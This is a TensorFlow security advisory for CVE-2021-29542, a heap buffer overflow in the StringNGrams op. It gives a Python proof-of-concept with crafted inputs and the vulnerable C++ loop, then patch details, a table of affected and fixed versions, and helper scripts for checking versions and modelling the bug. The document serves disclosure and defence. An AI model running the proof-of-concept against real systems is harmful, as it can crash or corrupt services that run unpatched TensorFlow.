First published: Fri May 14 2021
### Impact

An attacker can cause a heap buffer overflow by passing crafted inputs to `tf.raw_ops.StringNGrams`:

```python
import tensorflow as tf

separator = b'\x02\x00'
ngram_widths = [7, 6, 11]
left_pad = b'\x7f\x7f\x7f\x7f\x7f'
right_pad = b'\x7f\x7f\x25\x5d\x53\x74'
pad_width = 50
preserve_short_sequences = True

l = ['', '', '', '', '', '', '', '', '', '', '']

data = tf.constant(l, shape=[11], dtype=tf.string)

# 115 zeros followed by a single 3 (116 elements in total)
l2 = [0] * 115 + [3]

data_splits = tf.constant(l2, shape=[116], dtype=tf.int64)

out = tf.raw_ops.StringNGrams(data=data,
    data_splits=data_splits, separator=separator,
    ngram_widths=ngram_widths, left_pad=left_pad,
    right_pad=right_pad, pad_width=pad_width,
    preserve_short_sequences=preserve_short_sequences)
```

This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/1cdd4da14282210cc759e468d9781741ac7d01bf/tensorflow/core/kernels/string_ngrams_op.cc#L171-L185) fails to consider corner cases where input would be split in such a way that the generated tokens should only contain padding elements:

```cc
for (int ngram_index = 0; ngram_index < num_ngrams; ++ngram_index) {
  int pad_width = get_pad_width(ngram_width);
  int left_padding = std::max(0, pad_width - ngram_index);
  int right_padding = std::max(0, pad_width - (num_ngrams - (ngram_index + 1)));
  int num_tokens = ngram_width - (left_padding + right_padding);
  int data_start_index = left_padding > 0 ? 0 : ngram_index - pad_width;
  ...
  tstring* ngram = &output[ngram_index];
  ngram->reserve(ngram_size);
  for (int n = 0; n < left_padding; ++n) {
    ngram->append(left_pad_);
    ngram->append(separator_);
  }
  for (int n = 0; n < num_tokens - 1; ++n) {
    ngram->append(data[data_start_index + n]);
    ngram->append(separator_);
  }
  ngram->append(data[data_start_index + num_tokens - 1]); // <<<
  for (int n = 0; n < right_padding; ++n) {
    ngram->append(separator_);
    ngram->append(right_pad_);
  }
  ...
}
```

If input is such that `num_tokens` is 0, then, for `data_start_index=0` (when left padding is present), the marked line would result in reading `data[-1]`.

### Patches

We have patched the issue in GitHub commit [ba424dd8f16f7110eea526a8086f1a155f14f22b](https://github.com/tensorflow/tensorflow/commit/ba424dd8f16f7110eea526a8086f1a155f14f22b).

The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range.

### For more information

Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions.

### Attribution

This vulnerability has been reported by Yakun Zhang and Ying Wang of Baidu X-Team.
Credit: security-advisories@github.com
Affected Software | Affected Version | How to fix |
---|---|---|
Google TensorFlow | <2.1.4 | |
Google TensorFlow | >=2.2.0, <2.2.3 | |
Google TensorFlow | >=2.3.0, <2.3.3 | |
Google TensorFlow | >=2.4.0, <2.4.2 | |
pip/tensorflow-gpu | >=2.4.0, <2.4.2 | 2.4.2 |
pip/tensorflow-gpu | >=2.3.0, <2.3.3 | 2.3.3 |
pip/tensorflow-gpu | >=2.2.0, <2.2.3 | 2.2.3 |
pip/tensorflow-gpu | <2.1.4 | 2.1.4 |
pip/tensorflow-cpu | >=2.4.0, <2.4.2 | 2.4.2 |
pip/tensorflow-cpu | >=2.3.0, <2.3.3 | 2.3.3 |
pip/tensorflow-cpu | >=2.2.0, <2.2.3 | 2.2.3 |
pip/tensorflow-cpu | <2.1.4 | 2.1.4 |
pip/tensorflow | >=2.4.0, <2.4.2 | 2.4.2 |
pip/tensorflow | >=2.3.0, <2.3.3 | 2.3.3 |
pip/tensorflow | >=2.2.0, <2.2.3 | 2.2.3 |
pip/tensorflow | <2.1.4 | 2.1.4 |
CVE-2021-29542 is categorized as a critical vulnerability due to the potential for a heap buffer overflow.
To resolve CVE-2021-29542, upgrade TensorFlow to a patched release: 2.1.4, 2.2.3, 2.3.3, 2.4.2, or 2.5.0 and later.
CVE-2021-29542 affects TensorFlow versions before 2.1.4, 2.2.0 up to but not including 2.2.3, 2.3.0 up to but not including 2.3.3, and 2.4.0 up to but not including 2.4.2.
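The affected ranges can be turned into a quick local check. The following is a minimal sketch, not an official tool: the names `AFFECTED_RANGES`, `parse_version`, and `is_affected` are hypothetical, and the parser assumes a plain `major.minor.patch` string (pre-release suffixes such as `rc0` are not handled).

```python
# Half-open ranges [low, high) taken from the affected-versions table.
# (0,) is used as a stand-in lower bound for "any version before 2.1.4".
AFFECTED_RANGES = [
    ((0,), (2, 1, 4)),
    ((2, 2, 0), (2, 2, 3)),
    ((2, 3, 0), (2, 3, 3)),
    ((2, 4, 0), (2, 4, 2)),
]


def parse_version(text):
    """Convert a plain 'major.minor.patch' string into a tuple of ints."""
    return tuple(int(part) for part in text.split("."))


def is_affected(version_text):
    """Return True if the version falls inside one of the affected ranges."""
    version = parse_version(version_text)
    return any(low <= version < high for low, high in AFFECTED_RANGES)


if __name__ == "__main__":
    for candidate in ("2.1.3", "2.3.2", "2.4.2", "2.5.0"):
        print(candidate, "affected" if is_affected(candidate) else "not affected")
```

In practice the string passed to `is_affected` could be the value of `tf.__version__` from the installed package, provided it has the plain numeric form assumed here.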
An attacker can exploit CVE-2021-29542 by passing crafted inputs to the `tf.raw_ops.StringNGrams` op.
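To see why such inputs reach an out-of-bounds read, the index arithmetic from the kernel loop quoted in the Impact section can be modelled in a few lines of Python. This is only a sketch of that arithmetic: the function name `ngram_token_window` is hypothetical, `pad_width` stands for whatever `get_pad_width(ngram_width)` returns, and the sample values are chosen for illustration rather than derived from the proof of concept.

```python
def ngram_token_window(ngram_width, pad_width, num_ngrams, ngram_index):
    """Mirror the per-ngram index computations from the quoted C++ loop.

    Returns (left_padding, right_padding, num_tokens, last_token_index),
    where last_token_index is the index used by the marked line:
    data[data_start_index + num_tokens - 1].
    """
    left_padding = max(0, pad_width - ngram_index)
    right_padding = max(0, pad_width - (num_ngrams - (ngram_index + 1)))
    num_tokens = ngram_width - (left_padding + right_padding)
    data_start_index = 0 if left_padding > 0 else ngram_index - pad_width
    last_token_index = data_start_index + num_tokens - 1
    return left_padding, right_padding, num_tokens, last_token_index


if __name__ == "__main__":
    # Illustrative padding-only case: a width-2 ngram made of one left pad
    # and one right pad, so no real tokens remain.
    left, right, tokens, last = ngram_token_window(
        ngram_width=2, pad_width=1, num_ngrams=1, ngram_index=0
    )
    print(f"left={left} right={right} num_tokens={tokens} last_index={last}")
```

With these illustrative values `num_tokens` is 0 and the last-token index is -1, which corresponds to the `data[-1]` read described in the advisory. When at least one real token is present, the same computation yields a non-negative index.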
CVE-2021-29542 affects any application, on any platform, that runs one of the affected TensorFlow versions.